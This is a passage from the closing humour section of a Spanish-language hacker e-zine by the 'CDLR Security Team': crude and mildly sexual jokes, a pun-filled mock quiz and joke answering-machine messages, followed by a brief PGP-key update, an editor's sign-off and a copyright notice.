pista, con cada chica con la que se cruzaba, tocando un poco por aca y
tirando besitos por alla. La mujer se le acerco y empezo a seducirlo.
El dejo a la mujer con la que estaba y se dedico a la recien llegada.
Ella lo dejo avanzar todo lo que el quisiera; finalmente, era su marido.
En un momento, el le susurro una proposicion en el oido, y ella acepto.
Salieron, entraron a uno de los autos y tuvieron sexo.
Antes de desenmascararse, a medianoche, ella se escabullo, fue a su casa, se
saco el disfraz y se metio en la cama, preguntandose que clase de explicacion
le iba a dar el marido. Cuando el entro, ella estaba sentada en la cama,
leyendo (Proyecto_R mm no creo).
-Enrique; Como te fue? -le pregunto.
-Bueno, lo de siempre -dijo el-. Ya sabes que no la paso bien cuando no estoy
con vos.
-Enrique; Bailaste mucho?
-Ni una sola pieza. Cuando llegue, me encontre con Pedro, Guillermo y otros
muchachos, asi que nos fuimos a la planta alta y jugamos poker toda la
noche. Lo que no me vas a poder creer es lo que le paso al tipo al que le
preste mi disfraz...
"Moraleja: si te duele la cabeza, definitivamente, quedate en tu casa"
:::::TEST DE CULTURA GENERAL:::::::::::::::::::::::::::::::::::::::::::::::::
Instrucciones:
Seleccione la respuesta que Ud. considere correcta para cada pregunta.
Solo existe una respuesta correcta por cada pregunta.
1) Las mujeres nacidas en Hamburgo (Alemania) son:
a) Hamburguesas
b) Perros Calientes
c) Arepas
d) Reinas Pepiadas
2) El idioma hablado en Finlandia es:
a) Fines
b) Pert Plus
c) Head & Shoulders
d) Clairol
3) El hombre nacido en Noruega es:
a) Noruego
b) Nosuplico
c) Noimploro
d) Nopido
4) Nombre de las personas de Belgica:
a) Belga
b) Caramba
c) Rempampanos
d) Coño
5) El grupo extremista musulman mas conocido es:
a) Hamas
b) Nunca
c) Never
d) No way Jose
6) El grupo terrorista vasco se llama:
a) ETA
b) AQUELLA
c) ETOS
d) ETOS OTROS
7) Nombre del Ejercito Republicano Irlandes:
a) IRA
b) FURIA
c) COLERA
d) ARRECHERA
8) Ciudad de Argentina:
a) Mar de Plata
b) Mar de Oro
c) Mar de Leva
d) Mar... Garita
9) Pais cuya capital es Accra:
a) Ghana
b) Piherde
c) Trihunfa
d) Cohmpite
10) Pais tropical cuya capital es St. George's:
a) Granada
b) Dinamita
c) Bomba Molotov
d) Bomba Nuclear
11) Moneda oficial de la Republica de Guinea:
a) Franco de Guinea
b) Franco de Vita
c) Evio di Marzo
d) Yordano di Marzo
12) Capital de la Republica de la India:
a) Nueva Delhi
b) New York Delhi
c) Mc Donald's
d) Burger King
13) Pais de Africa:
a) Zambia
b) Zalsia
c) Meriengue
d) Riggie
14) Idioma oficial de Tailandia:
a) Tai
b) Talla
c) Taporaqui
d) Nosta
15) Pais de Africa cuya capital es Jartum:
a) Sudan
b) Transpiran
c) Se mojan
d) Apestan
16) Isla Britanica que se encuentra al este de Carolina del Norte
(USA):
a) Bermudas
b) Short
c) Pantalon Corto
d) Blue Jean
17) Capital de Kazajstan (Asia):
a) Alma-Ata
b) Alma-Mater
c) Alma-Naque
d) Alma-Cenar
18) Ciudad de Israel:
a) Tel Aviv
b) Tel Aobserve
c) Tel Adetalle
d) Tel Agarre
19) Ciudad de Alemania:
a) Colonia
b) Perfume
c) Desodorante
d) After Shave
20) Capital de la Republica de Fiji:
a) Suva
b) Ascienda
c) Descienda
d) Baje
::::La historia del SAPO:::::::::::::::::::::::::::::::::::::::::::::::::::::
irase una vez, en un bosque, una tortugita que recien comenzaba a caminar
un largo viaje, no habian pasado tres metros cuando se topo con una
lagartija que raudamente le dijo...
buenos dias se~ora tortuga...hacia donde se dirige???
voy camino al claro...le respondio
y usted seria tan amable de llevarme??
a lo que la tortuga dijo:...no, me es imposible..el camino es muy largo
como para llevar un peso extra...
y sin mediar pausa..prosiguio su marcha.....
la lagartija, un poco mas alla, vivazmente se habia subido una roca...
justo cuan la tortugita pasaba por el lugar.. PUM..la lagartija que se
encarama encimna de la pobre tortuga.....
ya habian pasado como dos horas cuando nuestros amigos se encuentran con
don Sapo...
buenos tardes seqora tortuga...hasta donde llega???
voy camino al claro...le respondio
y usted seqora lagartija....hacia donde va???
hasta aqui no mas SAPO CONCHATUMADRE
::::::El huesped distinguido:::::::::::::::::::::::::::::::::::::::::::::::::
Se acerca el gerente de un hotel de lujo a un huesped y le dice:
-Senor, todos los dias tengo quejas de su comportamiento en el bar y
en la piscina del hotel
-Pero, cualquiera se toma unas cervezas de mas, respondio el huesped.
-Si pero dicen los demas huesped que después Usted se orina en la
piscina, dice el gerente.
-ero que hay con eso?, todo el mundo se orina en las piscina.
A lo que respondio el gerente
- si, pero no desde el trampolin como Usted lo hace.
Colabracion de Rodolfo Gonzalez Abreu
Desde La Habana - Cuba
:::::::: Cadenas ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Realiza esta prueba, es sencilla y no te toma ni 1 minuto y te
divertirás un poco.....Te dará felicidad etc ... etc ...
ESPERO QUE SE TE CUMPLA....
TOMA UNA HOJA Y UN LAPIZ.
1. Cuenta las letras del nombre como te conocen,
2. Haz lo mismo con tu primer apellido.
3. Luego toma ambos resultados y multiplicalos.
4. luego le sumas al resultado el dia de tu nacimiento.
5. y el total lo Divides por la primera palabra que encuentres en
la direccion http://get.to/la.carajada
Ahora toma la hoja y ponla sobre tu mano derecha aprieta la hoja con
fuerza.
Cierra los ojos y di:
SEÑOR.....
DAME LA FUERZA.....
PARA DEJAR............
DE HACER ESTAS PENDEJADAS
Y PONERME A TRABAJAR!
:::::::::::::LA APUESTA::::::::::::::::::::::::::::::::::::::::::::::::::::
El abuelo con su nietito estaban rastrillando el patio. El nietito
encuentra una lombriz tratando de volver al agujero de donde salio,
y le dice a su abuelo:
- Abuelo, te apuesto a que soy capaz de meter la lombriz dentro de
su agujero.
- Te apuesto 5 dolares a que no puedes. La lombriz es muy blandita y
flexible, no vas a poder meterla en un orificio tan pequeno.
El nene acepta la apuesta, corre hacia el interior de la casa, y
vuelve con un aerosol de spray de cabello. Rocia al invertebrado, y
este queda recto y duro. Inmediatamente procede a introducirlo al
orificio.
El abuelo, aceptando la derrota, le paga los 5 dolares correspondientes.
Inmediatamente el abuelo se mete a la casa con la lata de spray. A
la media hora sale y le da otros 5 dolares al nieto.
- Abuelo, ya me diste los 5 dolares.
- Si, pero estos te los manda tu abuela.
Colaboracion de Urdaneta, F A Fernando (FURD)
Desde Maracaibo Venezuela
:::::::CONTESTADORAS TELEFONICAS:::::::::::::::::::::::::::::::::::::::::::
* Yo estoy en casa pero no contesto al telefono porque hay personas con las
que no quiero hablar. Deja tu numero: si no te llamo, eras tu.
* Hola, les habla el microondas porque el Contestador Telefonico se escapo
con el grabador. Si tienen algo que calentar, acerquenlo al microfono
mientras hablen...
* Hola! Habla aqui ustedes-saben-quien. Yo estoy ustedes-saben-donde. Si
quieren dejar ustedes-saben-que, haganlo ustedes-saben-cuando.
* (Con tono de voz aburrido) Hola, habla Dios...
* Hola! Saben lo que odio yo en estos mensajes del Contestador Telefonico?
Cuando la gente los hace innecesariamente largos, hablando y hablando sin
necesidad, volviendo a repetir lo que todos saben, y sin tener un poco de
lastima a las pobres personas que deben oir toda la tirada! Oh, estimado
oyente, te deseo que nunca tengas que escuchar un anuncio largo en toda tu
feliz vida!
* Usted esta cansado. Sus parpados se estan volviendo pesados y se cierran
lentamente. Usted tiene sueño y esta perdiendo gradualmente su voluntad y
su capacidad de resistir sugestiones. En cuanto oiga el bip sentira una
necesidad irrefrenable de dejar su nombre, numero de telefono y mensaje.
* Este contestador automatico esta conectado a un transformador de 50.000
voltios; este lindo gatito (se oye un maullido) morira electrocutado si
usted cuelga antes de haber dejado su mensaje.
* Alo, si, ALOO... ALOOO.... (Subiendo la voz cada vez mas) ALOOO... NO SE
OYE NADA!! ALOOO.. Bueno, como en este momento no te puedo oir por favor
deja tu mensaje despues del tono.
* Hola. Ahora di algo tu.
* Hola. La contestadora de Juan se rompio. Yo soy la nevera. Por favor deja
muy lentamente tu mensaje,y yo me lo cuelgo despues con uno de estos
imanes.
* Hola. Estas hablando con una maquina. Soy capaz de recibir mensajes. Mis
dueños no necesitan reparaciones, ni ventanas, ni un baño caliente, y sus
manteles estan limpios. Dan caridad a traves de la oficina y no necesitan
que se les saque una foto. Si aun estas conmigo, deja tu nombre y tu numero
y ellos se comunicaran contigo.
* Felicitaciones, te acabas de comunicar con la Agencia de Detectives Sexto
Sentido. Sabemos quien eres y lo que quieres, de modo que cuando sientas la
señal haz el favor de colgar.
* Hola. Probablemente estoy en casa. Solamente estoy evitando tener que
hablar con alguien que me esta por llamar. Dejame un mensaje, y si no te
devuelvo el llamado es que se trata de ti.
* Hola, habla Jorge. Lamento no poder atender el telefono justo en este
momento. Dejame un mensaje, y quedate al lado del telefono hasta que te
llame.
* Si eres un ladron, lo mas probable es que estemos aqui en casa limpiando
nuestras armas, por lo que no podemos atender el telefono. De lo contrario,
seguramente hemos salido de modo que lo mejor sera dejarnos un mensaje.
Colaboracion de Enrique Ordetx Lopez
Desde San Sebastian,Gipuzcoa,Pais Vasco,España
::::::::::LA SUSPICACIA DE UNA MADRE:::::::::::::::::::::::::::::::::::::::::
Federico vivia, en un departamento con Karla. Ante los ojos de la familia
de Federico, Karla solo compartia departamento con Federico... Nadie podia
comprobar otra cosa.
Un dia, Federico invita a su madre a cenar una noche en su apartamento de
soltero. Durante la cena la madre no pudo quitar su atencion en lo hermosa
que era Karla, la companera de apartamento de su hijo. Durante mucho tiempo
ella habia tenido sospechas de que su hijo tenia relacion con Karla y al
verla, la sospecha no pudo sino acrecentarse. En el transcurso de la velada,
mientras veia el modo en que los dos se comportaban, se pregunto si
estarian acostandose. Leyendo a su madre el pensamiento Federico le dijo:
* Mama, se lo que estas pensando, pero te aseguro que Karla y yo solo somos
companeros de apartamento. Aproximadamente una semana despues, Karla le
comento a Federico que desde el dia en que su madre vino a cenar, no
encontraba el cucharon grande de plata para servir la sopa.
Federico contesto que, conociendo a su madre, dudaba que ella se lo hubiese
llevado pero que le escribiria una nota, y que la dejaria en un lugar visible
en la casa de su madre... En la puerta del refrigerador. Asi que se sento
y escribio:
"Querida mama: No estoy diciendo que tu tomaras el cucharon de plata de
servir salsas pero tampoco estoy diciendo que no lo hicieras, pero el hecho
es que este ha desaparecido desde que tu viniste a cenar a mi departamento.
Con todo carino,
Federico".
Unos dias mas tarde, sobre su escritorio Federico encuentra una nota de su
madre que decia:
"Querido hijo:
No estoy diciendote que te acuestas con Karla o que no te acuestas con Karla,
pero el hecho es que si Karla se acostara en su propia cama, ya habria
encontrado el cucharon de plata para servir sopa, que yo puse bajo sus
sabanas.
Con todo carino,
Mama".
Colaboracion de Jorge Luis Fernandez
Desde Cuba
:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:
-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-
..--:: 17. Llaves PGP ::--..
By CDLR
Los que leyeron PR 8 Ya saben donde encontrarlas, los que no, pues aqui se
los digo: http://www.cdlr.org/llaves
Nota: Casi todos los miembros del Staff (por no decir todos, hemos cambiado
nuestras llaves PGP, asi que tendras que actualizar las tuyas si nos quieres
enviar mails cifrados.
Solo fue cuestion de Paranoia. ;)
:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:
-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-
..--:: 18. EOF ::--..
By Editor
Sha... Un numero escrito en 3, si, leiste bien, tres dias... igual que en el
numero anterior casi sin colaboradores (minimo pensaban que no volveriamos,
pero como pueden ver, si lo hicimos... y lo que no nos mata, nos hace mas
perezo... no, asi no era, ahh ya, Lo que no nos mata nos hace Mas Fuertes...
Esperen la proxima para Diciembre de este a~o, a ver si asi no piensan que
nos retrasamos..!!! XDDD
Bye...
CDLR
Security Team
:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:
-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-
Aunque no tenemos CopyRight, podemos decir
que esta totalmente prohibida la distribucion
Parcial o total de este texto con fines lucrativos
Todos los textos que aparecen en esta publicacion
son propiedad exclusiva de sus escritores, por lo
tanto es necesario que sus nombres aparezcan
si alguno de los articulos es copiado o mejorado.
CDLR
Security Team 1998 - 2000
Pon aqui el Cursor...
Ahora presiona Enter y mantenlo presionado...
Puedes ver como los creditos aparecen como en las peliculas..!!!
XDDDD
Smile You're on Candid Camera..!!!
:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:
-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-
|
E-Zines 
